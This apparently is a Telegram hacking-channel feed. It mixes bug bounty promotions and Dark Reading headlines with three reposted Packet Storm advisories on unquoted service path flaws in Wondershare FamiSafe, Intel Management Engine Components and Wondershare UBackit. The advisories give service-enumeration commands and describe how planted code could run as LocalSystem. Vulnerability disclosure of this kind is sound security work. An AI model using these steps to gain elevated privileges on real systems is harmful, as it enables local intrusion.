Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Bug Bounties in Sri Lanka

tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats.Continue reading on Bug Zero »
Read more...
Bug Zero is Going to Pay Your Security Bill for 2022

tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats.Continue reading on Bug Zero »
Read more...
Dark Reading: Attacks/Breaches
Where AI Falls Down in Cybersecurity

Many cybersecurity products claim to incorporate AI in some way, but in some cases, those claims aren't completely accurate.
Dark Reading: Attacks/Breaches
If the Cloud Is More Secure, Then Why Is Everything Still Broken?

The sooner we discover sources of risk, the better equipped we will be to create effective mitigations for them.
Dark Reading: Attacks/Breaches
Ransomware Adds New Wrinkle in Russian Cybercrime Market

Government crackdowns may destabilize Russian crime rings and strengthen their ties to Chinese allies.
Dark Reading: Attacks/Breaches
Enterprises Look Beyond Antivirus Software for Remote Workers

Priorities are shifting, with growing emphasis on endpoint detection and response (EDR) software and multifactor authentication (MFA), a recent survey of IT professionals shows.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Wondershare FamiSafe 1.0 Unquoted Service Path

https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png
Wondershare FamiSafe version 1.0 suffers from an unquoted service path vulnerability.

MD5 | d89bbee0fcce3bb599407b9e4a43f051

Download
# Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download-es.wondershare.com/famisafe_full7869.exe
# Tested Version: 1.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """

FSService FSService C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe Auto
# Service info:

C:\>sc qc FSService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FSService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FSService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Intel Management Engine Components 6.0.0.1189 Unquoted Service Path

https://3.bp.blogspot.com/-3DxkerR7uq4/WWlu9h9UGfI/AAAAAAAAIJw/dRDCcwrw3XEGYQWUo-AXJEEU7FQ8iTgpACLcBGAs/s1600/h115.png
Intel Management Engine Components version 6.0.0.1189 suffers from an unquoted service path vulnerability.

MD5 | 5e8d7d04d45632384f59cdaa34d55279

Download
#Exploit Title: Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-17
#Vendor : Intel
#Version : Intel(R) Management Engine Components 6.0.0.1189
#Vendor Homepage : https://www.intel.com
#Tested on OS: Windows 7 Pro

#Analyze PoC :
==============

C:\>sc qc LMS
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: LMS
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel(R)
Management Engine Components\LMS\LMS.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Intel(R) Management and Security Application
Local Management Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Wondershare UBackit 2.0.5 Unquoted Service Path

https://1.bp.blogspot.com/-ZbrkU7MDvJM/WWlvS7x--YI/AAAAAAAAINk/cO6KWZj5UFE3dAHctfHPCIXMYdjzVDfigCLcBGAs/s1600/h40.png
Wondershare UBackit version 2.0.5 suffers from an unquoted service path vulnerability.

MD5 | 391dee8bcd7ac5e3bf7bbe424a133635

Download
# Exploit Title: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/ubackit_full8767.exe
# Tested Version: 2.0.5
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "wsbackup" | findstr /i /v """

Wondershare wsbackup Service wsbackup C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe Auto
# Service info:

C:\>sc qc wsbackup
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: wsbackup
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare wsbackup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video